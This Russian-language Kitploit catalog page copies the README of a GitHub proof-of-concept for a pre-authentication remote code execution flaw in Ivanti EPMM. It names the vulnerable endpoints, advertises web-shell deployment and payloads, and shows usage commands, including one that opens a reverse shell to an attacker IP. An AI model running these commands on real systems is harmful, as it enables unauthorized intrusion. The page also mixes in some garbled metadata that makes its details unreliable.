Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # PoC для CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE через арифметическое расширение Bash | Kitploit
Инструменты/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# PoC для CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE через арифметическое расширение Bash

Репозиторий
61238 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1281 и CVE-2026-1340 — Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данный PoC предоставляется исключительно в образовательных целях и для исследований в области безопасности. Использование без явного разрешения незаконно.

🎯 Описание

Полный Proof of Concept (PoC) для эксплуатации уязвимостей CVE-2026-1281 и CVE-2026-1340, затрагивающих Ivanti Endpoint Manager Mobile (EPMM). Эти уязвимости позволяют выполнять произвольный код удалённо (RCE) без аутентификации через механизм Bash Arithmetic Expansion.

Уязвимости

  • CVE-2026-1281 : Инъекция кода в конечной точке /mifs/c/appstore/fob/
  • CVE-2026-1340 : Инъекция кода в конечной точке /mifs/c/aftstore/fob/
  • Оценка CVSS : 9.8 (Critical)
  • Эксплуатация : Активная эксплуатация in-the-wild (Zero-Day)

🚀 Возможности

  • ✅ Автоматизированная система валидации (8 тестов)
  • ✅ Эксплуатация Pre-Auth RCE
  • ✅ Автоматический reverse shell
  • ✅ Развёртывание веб-шелла
  • ✅ 50+ готовых payload-ов
  • ✅ Скрипты обнаружения для Blue Team
  • ✅ Полная документация

📦 Установка

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 Быстрое использование

# Проверка уязвимости
python3 exploit.py -t https://target.com -c

# Проверка RCE
python3 exploit.py -t https://target.com --test-rce

# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 Документация

  • Полный README — Подробная техническая документация
  • Руководство по использованию — Пошаговое руководство
  • Payload-ы — Коллекция из 50+ payload-ов
  • Руководство Red Team — Операционные сценарии

🔗 Ссылки

  • CERT-FR CERTFR-2026-ALE-001
  • Анализ Watchtowr Labs
  • CVE-2026-1281
  • CVE-2026-1340

👤 Автор

Mehdi Le Deaut — Консультант по кибербезопасности | Специалист Red Team

LinkedIn

⚖️ Лицензия

Этот проект распространяется под лицензией MIT — см. файл LICENSE для получения подробной информации.

🙏 Благодарности

  • CERT-FR за оперативное предупреждение
  • Watchtowr Labs за технический анализ
  • Сообществу специалистов по кибербезопасности
Скачать инструмент